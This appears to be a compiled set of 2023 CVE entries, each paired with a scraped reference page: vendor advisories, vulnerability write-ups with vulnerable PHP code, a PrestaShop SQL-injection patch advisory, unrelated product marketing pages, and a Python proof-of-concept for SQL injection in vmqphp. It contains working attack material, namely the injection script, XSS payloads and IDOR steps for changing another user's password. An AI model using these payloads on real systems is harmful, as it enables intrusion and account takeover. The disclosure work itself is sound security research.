An OS command injection vulnerability has been found on EasyPHP  Webserver affecting version 14.1. This vulnerability could allow an attacker to get full access to the system by sending a specially crafted exploit to the /index.php?zone=settings parameter. 

Fecha de publicación

26/09/2023

Recursos Afectados

EasyPHP Webserver, versión 14.1.

Descripción

INCIBE ha coordinado la publicación de 1 vulnerabilidad que afecta a EasyPHP Webserver 14.1, la cual ha sido descubierta por Rafael Pedrero.

A esta vulnerabilidad se le ha asignado el siguiente código, puntuación base CVSS v3.1, vector del CVSS y el tipo de vulnerabilidad CWE de cada vulnerabilidad:

*   **CVE-2023-3767**: CVSS v3.1: 9.8 | CVSS: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H | CWE-78.

Solución

La vulnerabilidad reportada ha sido solucionada en la última versión del producto afectado.

Detalle

**CVE-2023-3767**: se ha encontrado una vulnerabilidad de inyección de comandos del sistema operativo en el servidor web EasyPHP que afecta a la versión 14.1. Esta vulnerabilidad podría permitir a un atacante obtener acceso completo al sistema enviando un _exploit_ especialmente diseñado al parámetro '/index.php?zone=settings'.

CVE-2023-3767: Inyeccion De Comandos Os En Easyphp Webserver | INCIBE-CERT

A Cross-Site Request Forgery (CSRF) in admin_manager.php of Seacms up to v12.8 allows attackers to arbitrarily add an admin account.

**CVE-2023-43278**

版权声明：本文为博主原创文章，遵循 CC 4.0 BY-SA 版权协议，转载请附上原文出处链接和本声明。

\[CVE-ID\]

CVE-2023-43278

\[PRODUCT\]

Seacms <=12.8

\[VERSION\]

Seacms <=12.8

\[PROBLEM TYPE\]

CSRF

\[DESCRIPTION\]

There is a CSRF vulnerability in the backend management system of seacms v12.8

CVE-2023-43278: CVE-2023-43278_sugaryzheng的博客-CSDN博客

mooSocial v3.1.8 was discovered to contain a cross-site scripting (XSS) vulnerability via the change email function.

*   Home
*   Features
*   Screenshots
*   Pricing
*   Services
*   Testimonials
*   Showcases
*   Add-ons
*   Contact

**Mobile Friendly Social Network Software**

mooSocial is the best social network script to create a niche community or social site. It is features packed, highly configurable, expandable with many quality add-ons. mooSocial is mobile-friendly ready, it is easily accessible thru mobile web or Android and iOS mobile apps. Start your community site in minutes, It is easy to use even without design or programing skills.

Or

See people talking about us

Great aftermarket customer services

Reviewed by **Eddie Alder**

Fantastic product and customer support!

Reviewed by **Brett Cohen**

I have had only good experiences with the software mooSocial

Reviewed by **Dejan Dejan**

Hands down the best social network software period!

Reviewed by **Julian Hughes**

**Why Choose mooSocial?**

mooSocial is a **"white labeled" php social network software.  
It is **light, fast, easy to customize, and mobile-friendly.****

**

**Full Feature**

With all the features to build a successful social network e.g. blog, photo, group, event, video, topic…

**Monetization**

MooSocial supports many monetization methods such as advertising placement services, ad-free membership or exclusive access rights.

**Quick Support**

Multiple support channels (ticket, skype, community and online chat), Active Development and Docs

**Performance**

It has a lightweight codebase which will run blazingly fast even on a shared web hosting service.

**Mobile Apps**

Our publishable mobile apps will bring your community closer customer’s finger tip and allow you to engage with your members in a whole new way.

**No limit on code access**

Get all source code include mobi app source code.

**Addons**

Expand your social network easily, affordably with high-quality plugins and themes made by the same team. Most of plugins are compatible with Mobile Apps

**Internationalization (I18n)**

MooSocial is able to cater to users in different languages. It can handle multiple languages, scripts and cultural conventions (currency, sorting rules, number and dates formats…) without the need for redesign.

**Zero headache**

Zero headache to deal with 3rd party developers and compatible issues between developers becuase everything is from mooSocial Team





**

**

*   Full Features  - Click here to see a full list of features
    
    **User Profile**
    
    *   Activity Feed
    *   Friends
    *   Profile Privacy Settings
    *   Profile Cover Picture
    *   Profile Search
    *   Searchable Custom Profile Fields
    *   Featured Profile
    *   Friendly Profile URL
    
    **Video Sharing**
    
    *   Easily Share Youtube/Vimeo Videos
    *   Privacy Options
    *   Comments & Likes
    *   Tags
    *   Social Sharing
    *   Videos Search & Category
    *   Related Videos
    
    **User Group**
    
    *   Activity Feed
    *   Group Photos, Videos, Topics
    *   Invitation System
    *   Privacy Options
    *   Featured Groups
    *   Group Search & Category
    *   Social Sharing
    *   Membership Approval
    
    **User Blog**
    
    *   WYSIWYG Editor
    *   Privacy Options
    *   Comments & Likes
    *   Tags
    *   Images Uploader
    *   Social Sharing
    *   Blogs Search
    
    **Discussion Topics**
    
    *   Attachments
    *   WYSIWYG Editor
    *   Comments & Likes
    *   Tags
    *   Social Sharing
    *   Topics Search & Category
    *   Pin/Lock Topic
    
    **Photo Album**
    
    *   Photo Tagging
    *   Privacy Options
    *   Comments & Likes
    *   Tags
    *   Easy Uploader
    *   Social Sharing
    *   Albums Search & Category
    
    **Admin Panel**
    
    *   Admin Notifications
    *   Custom Blocks
    *   Easy Logo Changer
    *   Bulk Mail
    *   Spam Challenges
    *   User Roles/Permissions
    *   Pages Manager
    *   Hooks Manager
    *   Plugins Manager
    *   Themes Manager
    *   Languages Manager
    
    **Miscellaneous**
    
    *   Mobile Site
    *   Private Message
    *   Notifications Center
    *   Friends Suggestion
    *   URL & Video Parsing in Activity Feed
    *   Upload Photo in Activity Feed
    *   Facebook Integration
    *   Global Search
    *   Item Reporting
    
    **Event Management**
    
    *   RSVP Tracking
    *   Activity Feed
    *   Invitation System
    *   Privacy Options
    *   Event Search & Category
    *   Social Sharing
    *   Event Map
    
    **Monetize Features**
    
    *   Membership Subscription
    *   PayPal Adaptive Payments
    *   Ad Network Support
    

**

**

**Pricing + Combo**

*   mooSocial Self-hosted
*   mooSocial Cloud

**mooSocial License**

**$ 99**

One-time-fee  
(1 domain)

30-days free support

Include All Core Features and Core Plugins: Blogs, Photos Videos, Topics, Groups, Events

Full Source Code

First time free installation service

White-label. Customizable

12 Months Update Subscription

You can buy mooSocial license now then get the apps in combo packages later here

Recommended

**Deluxe**

**

$697

$ 669**

One-time-fee  
(1 domain)

mooSocial Pro Licence ($299)

Android and IOS Licence ($398)

Full Source Code

First time free installation service

White-label. Customizable

REST API Library

12 Months Update Subscription

60-days free support

**Ultimate**

**

$3164

$ 1669**

**Services**

**SOFTWARE MODIFICATION**

Want a unique feature? A specialized  
plugin? or even some simple changes?  
Sure! Our Customization Team will  
develop it for you quickly and  
efficiently.

**THEME DEVELOPMENT**

Distinguish your site with style. Our  
Design Team knows how to create  
unique visual experiences which are  
crucial to the success of your business.

**SITE MIGRATION**

Have a Social Network already but  
wanted to move to mooSocial? No  
problem, our Digital Mover Team will  
have you settled in your new home  
comfortably.

**PRODUCT INSTALLATION**

Installing mooSocial is a "no brainer".  
However, if you do not want to be  
bothered with it, we could help to get  
your new site up and running in no time.

**PRODUCT UPGRADE**

It doesn't matter which version you  
currently have, or even if our script was  
modified. We can upgrade your site to  
the greatest and latest with everything  
intact.

**INTEGRATION**

We can get mooSocial integrated with  
any service out there whether it is a  
payment gateway or a CMS. As long as  
there is API access, We can do it.

**What people say about us**

**Fantastic product and customer support!**

The folks at mooSocial have been fantastic. They assisted me in getting the product installed on my server and have been so helpful. The product itself is top notch, I did not come across any other product that is so perfect for social media.

Reviewed by Brett Cohen

**Hands down the best social network software period!**

I give it 10 stars if I could. Ryan and his team provide excellent customer support and best of all, the best social network software on the market. Your time and money will not be waste if you go with this company. Other softwares are full of bugs but this one is a winner!

Reviewed by Julian Hughes

**Moosocial Best Platform Ever!!!**

Moosocial Best Platform with all the tools you need for a social network, and marketing website, a lot of potential for the price, is nicely succeeding on the tools they are providing. It has a wiki, an instant messages, document management system - all (and a lot more) integrated in one extensible platform. Very recommended! Attractive interface and full of functionalities. Also excellent support from their community.

Reviewed by William D. Abreu

**Best around!**

We had tried many platforms including JomSocial, Dolphin.Pro, And Users Ultra before finding MooSocial. Let me just say that MooSocial is the absolute BEST social networking platform we've seen. The platform is great, the staff are helpful, and the community is helpful.

Reviewed by Jordan Dawson

**Very great powerful script for social network**

i used to be with oxwall until i bumped into moo social its got so much more great stuff that wow,ed me the support has been great and moosocial is so much awesome :) keep up the great work

Reviewed by snitch567

**Best script, ready made social site**

I searched years for a good script, tried many out there, ans spent hard earned money looking for a great script to have a small social site. I was ready to quit, then happened across moosocial. It was a dream come true. You don't have to be a coder to have a great light script.

Reviewed by Mikailah

**5 stars!**

Awesome script and best social network script out there period. I dont see no bugs and installation was so simple. Great support too!

Reviewed by julz

**Showcases**

*   
*   
*   
*   

**Spice up your networks with these Add-ons and Turnkey Solutions**

*   
*   
*   
*   
*   
*   

MORE ADD-ONS

**F.A.Q**

*   Frequently Asked Questions
*   More FAQs

**Does your license expire?**

No, mooSocial License does not exprie. It is a perpetual license and you can use our software indeﬁnitely.

**Will I be able to download updates in the future if I buy now?**

Yes, all updates are free to download as long as your software update subscription is active. Each license includes a 12 months update subscription.

**What happens after my update subscription expires?**

You can renew your update subscription for a minimal cost. Otherwise, you can continue using the software on your site.

**How much does it cost to renew my update subscription?**

$49 for every 12 months.

**Is the source code encrypted?**

No, you have 100% access to the source code.

**Can I modify the software to meet my requirements?**

Yes, you can do whatever modifications that you wish.

**Do I need to have any mooSocial branding on my site?**

Absolutely not. Unlike other prodducts, we do not force you to have our branding on your site

**Do you offer custom service?**

Yes, we do provide custom theme & development service. Please contact us for more details

**What payment methods do you accept?**

Currently, we accept Paypal, Visa/Master card (via Paypal), Western Union and MoneyGram

**Is it easy to translate the software?**

Yes, very easy. All the language strings are in a single language file. You can also install a third party software to make your translation even easier.

**What are the server requirements?**

Minimum:

*   PHP 5.4+
*   MySQL 5+
*   PHP extensions: MySql PDO, GD2, Curl, libxml, exif, zlib (if you need to export theme)
*   Magic quotes must be disabled
*   Memory Limit: 128M+

Recommended:

*   Apache server with mod\_rewrite

**Do I have to pay extra to remove any mentions of mooSocial?**

No, absolutely not.

**Do you offer an installation of upgrades?**

We do offer an upgrade installation service, the cost of the upgrading service will depend on how many hours we need to spend to re-apply any customizations you've made so far.

**How many users can mooSocial support?**

It is primarily dependent on the capabilities of your server. On shared hosting, mooSocial be able to support tens of thousands of users, while a single dedicated server can usually support upwards of one hundred thousand however we make no guarantee of performance due to the many variables involved. For each case of servers, we need to analyze to optimize if it problem happened.

**How soon will I receive my download information after purchasing?**

You will receive your download information very shortly after purchase..

**Is my billing information kept private when I purchase?**

Absolutely. In fact, we never see or store your billing information on our servers. Your information is processed via paypal secure payment gateway.

**How many licenses do I need?**

Each license is valid for a single public installation of the software, regardless of domains. You are of course welcome to create a private copy for development purposes.

**Do I need more than one license if i'm installing mooSocial on several subdomains/directories?**

Yes, every installation of mooSocial requires a license. However, you are entitled to create a second private installation for development purposes provided it's not publicly accessible.

**If I upgrade to a new version, will I lose my customizations or admin panel settings?**

This depends on what type of customizations you've made. If you've simply created new files and linked to them from mooSocial, it's unlikely that you will lose any customizations you've made. If you've edited the core code and you overwrite it with the new files from the upgrade package, you may lose your customizations. To avoid this, please make sure you full backup before upgrading, use compare tool to compare and merge changes that you made into the new core code. We do provide upgrading service so that contact us if you’re not sure what you should do.

**Do you offer trial version?**

Yes, Please download at https://moosocial.com/free-trial-download/

**Can I redistribute or resell mooSocial?**

No, you are not allowed to redistribute or resell mooSocial in any way.

**Can I extend my support service?**

Yes, support service can be purchased for $39/month.

**Can mooSocial be installed in a subdirectory or subdomain?**

Yes,You can install it on any location on your server.

**Can I Try Before I Buy?**

Please download it here https://moosocial.com/free-trial-download/

**Will I lose all my users if I upgrade?**

All user data and settings will be retained after upgrading. Make sure you full backup your site before upgrading.

**Do I get support with my purchase?**

After purchasing a license, you will receive a 30 days FREE support service via our ticket system, online chat or client community at http://community.moosocial.com/

**What type of issues does support cover?**

Our support team will assist with initial Software installation, general questions related to the script and technical errors encountered during the normal use of unmodified script. We cannot assist with customization of the script.

**How long do I get support after purchase?**

Up to 60 days of support

**How long does it take to get a response from support?**

Response times vary based on ticket volume but we do our best to respond to all tickets within several hours during business hours, or the next business day if submitted during off hours.

**Can I sell my website in the future?**

Yes, you're free to sell your website but not your mooSocial license since the licenses are non-transferable. In other words, if you choose to sell your website which contains a mooSocial license on it, the new owner would need to purchase their own license. What many clients do is simply incorporate the cost of the new license into the sale price of the website and purchase a new license on behalf of the new owner.

**Can I hire mooSocial to write custom plugins/customizations?**

Yes, we’re happy to help.

**I don't have a domain yet. Can I still purchase mooSocial?**

Yes! You can purchase mooSocial now and update your registered domain name later.











**

CVE-2023-43326: mooSocial - PHP Social Networking Software

An issue in Service Provider Management System v.1.0 allows a remote attacker to gain privileges via the ID parameter in the /php-spms/admin/?page=user/ endpoint.

**About the Application**

This Service Provider Management System v.1.0 is a sort of Content Management System (CMS) that is built specifically for companies that provide different services. The project is a company website that allows the management to dynamically manage the site information and other data on the front end. This project has 2 modules which are the Public and Management site.

The Management Site is the side of the system where accessible to the company staff or system-registered users only. On this site, users are required to log in with their valid system credentials to gain access to the features and functionalities. Users have 2 different roles which are the Administrator and the Staff. The Administrator users have the privilege to manage and access all the features and functionalities of the said site while the Staff users only have limited permissions. Here, system users can manage the list of services that their company provided. They can also update the dynamic page content of the public website on this side.

**Vulnerability Description**

Privilege Escalation in Service Provider Management System v.1.0 allows a remote attacker to gain privileges via the ID parameter in the /php-spms/admin/?page=user/manage_user&id=9 endpoint.

**Vulnerable Code**

**Filename:** /php-spms/admin/user/manage_user.php

**Vulnerable Endpoint:** /php-spms/admin/?page=user/manage_user&id=9

**Vulnerable Parameter:** id

**Code:**

1
2
3
4
5
6
7
8
9
10
11
12

<?php 
if(isset($_GET['id'])){
    $user = $conn->query("SELECT * FROM users where id ='{$_GET['id']}' ");
    foreach($user->fetch_array() as $k =>$v){
        $meta[$k] = $v;
    }
}
?>
<?php if($_settings->chk_flashdata('success')): ?>
<script>
	alert_toast("<?php echo $_settings->flashdata('success') ?>",'success')
</script>

The code checks if the id parameter is set in the URL but does not verify whether the authenticated user has the appropriate permissions to access the user data associated with that id. It assumes that anyone with the id parameter can access any user’s information. This oversight creates a security vulnerability known as ‘Broken Access Control (BAC), especially concerning the id parameters.

Broken Access Control is a security vulnerability in web applications and systems where proper access controls are not enforced, allowing unauthorized users to gain access to resources, perform actions they shouldn’t, or manipulate the system in unintended ways. Examples include inadequate authorization checks, missing authentication, direct object reference, overly permissive permissions, and failure to revoke access. To mitigate this issue, applications should implement strong access controls, enforce authentication and authorization rigorously, follow least privilege principles, and regularly test for and address potential access control problems.

**Impact of Broken Access Control**

The exact reasons for the impact of broken access control in a web application or system include:

**Unauthorized Access**: Broken access control allows unauthorized users to gain access to resources and functionality that should be restricted to certain users or roles.

**Data Exposure**: When access controls are not properly enforced, sensitive data can be exposed to users who shouldn’t have access, leading to data leaks and breaches.

**Data Manipulation**: Attackers can alter, delete, or insert data into the system, potentially causing data corruption and fraudulent activities.

**Attack Scenario**

*   Go to http://localhost/php-spms/admin/?page=user/list and create 2 user, alice as administrator and bob as staff.

_User creation_

*   Let’s view both user and notice the id assigned to each user.

_User id of both user_

*   Let’s login as bob who is a staff and visit the URL http://localhost/php-spms/admin/?page=user/manage_user&id=12

_Logged in as bob_

*   Let’s change the id value from 12->11 and see if we can access the details of user alice.

_Alice’s detail is accessible by bob_

*   We can able to view the information of alice, let’s try to change the password of alice.

_Alice’s password is changed_

Remediating broken access control vulnerabilities is crucial to secure your web application or system. To address these vulnerabilities effectively, follow these remediation steps:

**Implement Proper Authentication and Authorization**: Ensure that your application uses strong authentication mechanisms to verify user identities. Use multi-factor authentication (MFA) for added security. Implement fine-grained authorization controls based on user roles and privileges. Users should only have access to resources and actions they are authorized to use.

**Access Control Lists (ACLs) or Role-Based Access Control (RBAC)**: Implement ACLs or RBAC to define and manage access permissions for users and resources. This helps maintain a clear and structured access control policy.

**Secure Session Management**: Implement secure session management to ensure that session tokens are generated securely, invalidated after logout or inactivity, and protected against session fixation attacks.

That’s all in this writeup.

Thanks for reading this far. If you enjoyed the writeup, do support me **here**.

CVE-2023-43457: CVE-2023-43457 - Broken Access Control (BAC)

szvone vmqphp <=1.13 is vulnerable to SQL Injection. Unauthorized remote users can use sql injection attacks to obtain the hash of the administrator password.

import requests

import re

import hashlib

import time

url \= "http://127.0.0.1:887" \# target ip

payload1 \= "/index/index/closeOrder?orderId\[123\]=123"

res \= requests.get(url \= url + payload1)

r \= re.findall('\\'key\\' => \\'<a class="toggle" title="(.\*?)"\\>', res.text) \# to get hash key

key \= r\[0\]

print(key)

payId \= 'hello5' \# Enter any one

mytype \= "1e0'-updatexml(1,concat(0x7e,user(),0x7e,version(),0x7e),3)-'1" #SQL statements injected with errors

price \= '1100' #It is best to write an integer of 100, and it cannot be repeated with the previous

byte\_sign \= (payId + mytype + price + key).encode(encoding\='utf-8')

sign \= hashlib.md5(byte\_sign).hexdigest()

payload2 \= "/createOrder?payId="+payId+"&type="+mytype+"&price="+price+"&sign="+sign

print(url+payload2) #Get the payload and access it directly in the browser

CVE-2023-43132: test

Cross Site Scripting (XSS) vulnerability in Resort Reservation System v.1.0 allows a remote attacker to execute arbitrary code and obtain sensitive information via the room, name, and description parameters in the manage_room function.

Submitted by oretnom23 on Saturday, April 15, 2023 - 15:51.

This simple project is entitled **Resort Reservation System**. It is a simple web application that provides an automated platform for certain resort management to easily store and retrieve reservation records. It was mainly developed using **PHP Language** and **SQLite3 Database**. It has a simple and pleasant user interface using **Bootstrap v5 Framework**. The project contains **CRUD** _(Create, Read, Update, and Delete)_ Operations and user-friendly features and functionalities.

****How does the Resort Reservation System work?****

This **Resort Reservation System** was mainly developed and can only be accessed by the resort management. Here, resort management can dynamically list all the rooms/cottages and extra fees that are available at their resort. They can simply encode or store their customer reservation records along with some other charges. Using the system, users can encode first the customer reservation details and the room or cottage they wanted to take and add extra fees or charges when the customer checked in.

****Features and Functionalities****

This **Resort Reservation System** project contains the following features and functionalities:

*   **Login and Logout**
*   **Room/Cottage Management**
    *   **Add New Room/Cottage**
    *   **List All Rooms/Cottages**
    *   **Update Room/Cottage Details**
    *   **View Room/Cottage Details**
    *   **Delete Room/Cottage**
*   **Extra Fee Management**
    *   **Add New Extra Fee**
    *   **List All Extra Fees**
    *   **Update Extra Fee Details**
    *   **View Extra Fee Details**
    *   **Delete Extra Fee**
*   **Reservation Management**
    *   **Add New Reservation**
    *   **List All Reservation**
    *   **Update Reservation Details**
    *   **View Reservation Details**
    *   **Delete Reservation**
*   **User Management**
    *   **Add New User**
    *   **List All Users**
    *   **Update User Details**
    *   **View User Details**
    *   **Delete User**

****Technologies****

This **Resort Reservation System** was developed using the following technologies:

*   **XAMPP**
*   **VS Code Editor**
*   **HTML**
*   **CSS**
*   **PHP**
*   **SQLite3**
*   **JavaScript**
*   **jQuery**
*   **Ajax Request**
*   **Bootstrap Framework**
*   **Google Icons**

****Snapshots****

Here are some snapshots of some pages of this **Resort Reservation System**:

****Login Page****

****Home Page****

****Room and Cottages List****

****Extra Fees List****

****Reservation List****

****Reservation Details****

The **Resort Reservation System** project complete source code zip file is available on this website and is free to download. Feel free to download and modify the source code the way you desire. The project was mainly developed for educational purposes only and not commercially.

****How to Run****

**Requirements**

*   **Download** and **Install** any **local web server** such as **XAMPP/WAMP.**
*   **Download** the provided source code **zip** file. (_download button is located below_)

**Installation/Setup**

1.  Open your XAMPP/WAMP php.ini file and uncomment the **sqlite3** **extension**. Then, save the file.
3.  **Open** your **XAMPP/WAMP's Control Panel** and start ****Apache****.
4.  **Extract** the **downloaded source code **zip** file**.
5.  If you are using **XAMPP**, **copy** the extracted source code folder and **paste** it into the **XAMPP's "htdocs" directory**. And If you are using **WAMP**, **paste** it into the **"www" directory.**
6.  **Browse** the **Resort Reservation System** in a **browser**. i.e. ****http://localhost/php-sqlite-cqs/****.

****Default Admin Access****

Username: **admin**  
Password: **sourcecodester&123**

That's it! I hope this **Resort Reservation System in PHP and SQLite3 Source Code** will help you with what you are looking for and that you'll find something useful for your current and future **PHP Projects**.

Explore more on this website for more **Tutorials** and **Free Source Codes**.

****Enjoy =)****

*   4485 views

CVE-2023-43458: Resort Reservation System in PHP and SQLite3 Source Code Free Download

UpLight cookiebanner before 1.5.1 was discovered to contain a SQL injection vulnerability via the component Hook::getHookModuleExecList().

**IMPORTANT NOTICE**: DO NOT REPORT VULNERABILITIES SOLELY TO THE AUTHOR OR MARKETPLACE.

We urge you to report any vulnerabilities directly to us. Our mission is to ensure the safety and security of the PrestaShop ecosystem. Unfortunately, many module developers may not always recognize or acknowledge the vulnerabilities in their code, whether due to lack of awareness, or inability to properly evaluate the associated risk, or other reasons.

Given the rise in professional cybercrime networks actively seeking out these vulnerabilities, it's crucial that any potential threats are promptly addressed and the community is informed. The most effective method to do this is by publishing a CVE, like the one provided below.

Should you discover any vulnerabilities, **please report them to us at: report\[@\]security-presta.org**.

Every vulnerability report helps make the community more secure, and we are profoundly grateful for any information shared with us.

In the module “Cookie Law - Banner + Cookie blocker” (cookiebanner) up to version 1.5.0 from UpLight for PrestaShop, a guest can perform SQL injection in affected versions.

**Summary**

*   **CVE ID**: CVE-2023-39640
*   **Published at**: 2023-09-21
*   **Advisory source**: Friends-Of-Presta.org
*   **Platform**: PrestaShop
*   **Product**: cookiebanner
*   **Impacted release**: <= 1.5.0 (1.5.1 fixed the vulnerability)
*   **Product author**: UpLight
*   **Weakness**: CWE-89
*   **Severity**: critical (9.8)

**Description**

The method Hook::getHookModuleExecList() inside an override of the module has sensitive SQL calls that can be executed with a trivial http call and exploited to forge a SQL injection.

This exploit uses a PrestaShop front controller and most attackers can conceal the module controller’s path during the exploit, so you will never know within your conventional frontend logs that it exploits this vulnerability. **You will only see “POST /” inside your conventional frontend logs.** Activating the AuditEngine of mod\_security (or similar) is the only way to get data to confirm this exploit.

**CVSS base metrics**

*   **Attack vector**: network
*   **Attack complexity**: low
*   **Privilege required**: low
*   **User interaction**: none
*   **Scope**: unchanged
*   **Confidentiality**: high
*   **Integrity**: high
*   **Availability**: high

**Vector string**: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

**Possible malicious usage**

*   Obtain admin access
*   Remove data from the associated PrestaShop
*   Copy/paste data from sensitive tables to FRONT to expose tokens and unlock admins’s ajax scripts
*   Rewrite SMTP settings to hijack emails

**Patch from 1.4.5 and 1.5.0**

    --- 1.4.5/modules/cookiebanner/controllers/front/settings.php
    +++ XXXXX/modules/cookiebanner/controllers/front/settings.php
    ...
            } elseif (Tools::isSubmit('submitSettings')) {
                $module_list = Tools::getValue('module_list');
                $disabled_modules_list = array();
                if (is_array($module_list)) {
                    foreach ($module_list as $id_module => $authorized) {
                        if (!$authorized) {
    -                       $disabled_modules_list[] = $id_module;
    +                       $disabled_modules_list[] = (int) $id_module;
                        }
                    }
                } else {
                    $this->errors[] = $this->l('No modules selected!');
                }
    

    --- 1.4.5/modules/cookiebanner/override/classes/Hook.php
    +++ XXXXX/modules/cookiebanner/override/classes/Hook.php
    ...
                if (count($disabled_modules_list)) {
    -               $sql->where('m.`id_module` NOT IN ('.implode(',', $disabled_modules_list).')');
    +               $sql->where('m.`id_module` NOT IN ('.implode(',', array_map('intval', $disabled_modules_list)).')');
                }
    

    --- 1.5.0/modules/cookiebanner/override/classes/Hook.php
    +++ XXXXX/modules/cookiebanner/override/classes/Hook.php
    ...
            if (!empty(self::$disabledHookModules)) {
    -           $sql->where('m.id_module NOT IN (' . implode(', ', self::$disabledHookModules) . ')');
    +           $sql->where('m.`id_module` NOT IN ('.implode(',', array_map('intval', self::$disabledHookModules)).')');
            }
    

**WARNING : Be warned that you must check the hook installed here** :

    --- 1.4.5/override/classes/Hook.php
    +++ XXXXX/override/classes/Hook.php
    ...
                if (count($disabled_modules_list)) {
    -               $sql->where('m.`id_module` NOT IN ('.implode(',', $disabled_modules_list).')');
    +               $sql->where('m.`id_module` NOT IN ('.implode(',', array_map('intval', $disabled_modules_list)).')');
                }
    

    --- 1.5.0/override/classes/Hook.php
    +++ XXXXX/override/classes/Hook.php
    ...
            if (!empty(self::$disabledHookModules)) {
    -           $sql->where('m.id_module NOT IN (' . implode(', ', self::$disabledHookModules) . ')');
    +           $sql->where('m.`id_module` NOT IN ('.implode(',', array_map('intval', self::$disabledHookModules)).')');
            }
    

**Other recommendations**

*   It’s recommended to upgrade to the latest version of the module **cookiebanner**.
*   Upgrade PrestaShop to the latest version to disable multiquery executions (separated by “;”) - be warned that this functionality **WILL NOT** protect your SHOP against injection SQL which uses the UNION clause to steal data.
*   Change the default database prefix ps_ with a new longer, arbitrary prefix. Nevertheless, be warned that this is useless against blackhats with DBA senior skill because of a design vulnerability in DBMS
*   Activate OWASP 942’s rules on your WAF (Web application firewall), be warned that you will probably break your backoffice and you will need to pre-configure some bypasses against this set of rules.

**Timeline**

Date

Action

2023-05-24

Issue discovered during a code review by TouchWeb.fr

2023-05-24

Contact PrestaShop Addons security Team to confirm versions scope by author

2023-05-26

PrestaShop Addons security Team confirm versions scope

2023-07-25

Request a CVE ID

2023-08-25

Received CVE ID

2023-09-21

Publish this security advisory

**Links**

*   PrestaShop addons product page
*   National Vulnerability Database

**DISCLAIMER:** _The French Association Friends Of Presta (FOP) acts as an intermediary to help hosting this advisory. While we strive to ensure the information and advice provided are accurate, FOP cannot be held liable for any consequences arising from reported vulnerabilities or any subsequent actions taken._

CVE-2023-39640: [CVE-2023-39640] Improper neutralization of SQL parameter in Cookie Law - Banner + Cookie blocker module for PrestaShop

Cross Site Scripting vulnerability in Service Provider Management System v.1.0 allows a remote attacker to execute arbitrary code and obtain sensitive information via the firstname, middlename and lastname parameters in the /php-spms/admin/?page=user endpoint.

**About the Application**

This Service Provider Management System v.1.0 is a sort of Content Management System (CMS) that is built specifically for companies that provide different services. The project is a company website that allows the management to dynamically manage the site information and other data on the front end. This project has 2 modules which are the Public and Management site.

The Management Site is the side of the system where accessible to the company staff or system-registered users only. On this site, users are required to log in with their valid system credentials to gain access to the features and functionalities. Users have 2 different roles which are the Administrator and the Staff. The Administrator users have the privilege to manage and access all the features and functionalities of the said site while the Staff users only have limited permissions. Here, system users can manage the list of services that their company provided. They can also update the dynamic page content of the public website on this side.

**Vulnerability Description**

Cross Site Scripting vulnerability in Service Provider Management System v.1.0 allows a remote attacker to execute arbitrary code and obtain sensitive information via the firstname, middlename and lastname parameters in the /php-spms/admin/?page=user endpoint.

**Vulnerable Code**

**Filename:** /php-spms/admin/user/index.php

**Vulnerable Endpoint:** /php-spms/admin/?page=user

**Vulnerable Parameter:** firstname, middlename, lastname

**Code:**

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32

<form action="" id="manage-user">	
	<input type="hidden" name="id" value="<?php echo $_settings->userdata('id') ?>">
		<div class="form-group">
			<label for="name">First Name</label>
			<input type="text" name="firstname" id="firstname" class="form-control" value="<?php echo isset($meta['firstname']) ? $meta['firstname']: '' ?>" required>
		</div>
		<div class="form-group">
			<label for="name">Middle Name</label>
			<input type="text" name="middlename" id="middlename" class="form-control" value="<?php echo isset($meta['middlename']) ? $meta['middlename']: '' ?>">
		</div>
		<div class="form-group">
			<label for="name">Last Name</label>
			<input type="text" name="lastname" id="lastname" class="form-control" value="<?php echo isset($meta['lastname']) ? $meta['lastname']: '' ?>" required>
		</div>
		<div class="form-group">
			<label for="username">Username</label>
			<input type="text" name="username" id="username" class="form-control" value="<?php echo isset($meta['username']) ? $meta['username']: '' ?>" required  autocomplete="off">
		</div>
		<div class="form-group">
			<label for="password">Password</label>
			<input type="password" name="password" id="password" class="form-control" value="" autocomplete="off"><small><i>Leave this blank if you dont want to change the password.</i></small>
		</div>
		<div class="form-group">
			<label for="" class="control-label">Avatar</label>
			<div class="custom-file">
				<input type="file" class="form-control" id="customFile" name="img" onchange="displayImg(this,$(this))" accept="image/png, image/jpeg">
			</div>
		</div>
		<div class="form-group d-flex justify-content-center">
			<img src="<?php echo validate_image(isset($meta['avatar']) ? $meta['avatar'] :'') ?>" alt="" id="cimg" class="img-fluid img-thumbnail">
		</div>
</form>

When users input their names, such as their firstname, middlename, and lastname, the website neglects the critical step of sanitizing this information to ensure it’s free from potentially harmful characters before storing it in the backend. This oversight creates a security vulnerability known as ‘Stored Cross-Site Scripting’ (Stored XSS), especially concerning these name parameters.

Stored Cross-Site Scripting (XSS) is a type of security vulnerability that occurs in web applications when user input, often in the form of text or other content, is not properly sanitized or validated before being stored on the server and then later displayed to other users. This vulnerability allows attackers to inject malicious scripts, typically in the form of JavaScript code, into the application’s data storage. When other users retrieve and view this data, the injected script code is executed within their browsers, potentially leading to a range of malicious actions.

**Impact of Stored Cross-Site Scripting**

The impacts of Stored Cross-Site Scripting (Stored XSS) are mentioned below:

**Session Hijacking**: Attackers can hijack user sessions, gaining unauthorized access to accounts and allowing them to perform actions on behalf of users or access confidential data.

**Manipulation of Web Pages**: Stored XSS can alter the appearance and functionality of web pages, potentially tricking users into executing unintended actions, clicking on malicious links, or downloading malware.

**Attack Scenario**

*   Go to http://application ip/php-spms/admin/?page=user.

*   Provide payload as "><script>alert("XSS on Firstname"), "><script>alert("XSS on Middlename"), "><script>alert("XSS on Lastname") on parameter such as firstname, middlename and lastname respectively.

_User Details_

*   Click on Update.
    
*   You will observe the popup of each payload we provided.
    

_XSS on Firstname_

_XSS on Middlename_

_XSS on Lastname_

Mitigating stored cross-site scripting (XSS) vulnerabilities is crucial for securing web applications. To prevent stored XSS, follow these best practices:

*   **Whitelist Input**: Only allow specific, safe characters and patterns in user input. Reject any input that doesn’t conform to this whitelist.
    
*   **Data Sanitization**: Filter and clean user input to remove or encode any potentially malicious characters. Use libraries like OWASP’s Java Encoder, PHP’s htmlspecialchars, or equivalent functions in other languages.
    
*   **Sanitization Libraries**: Use security libraries and frameworks that provide built-in XSS prevention mechanisms, such as Ruby on Rails, Django, or AngularJS.
    
*   **Use HTTP-Only Cookies**: Mark cookies as HTTP-only to prevent JavaScript from accessing them, reducing the impact of XSS attacks.
    
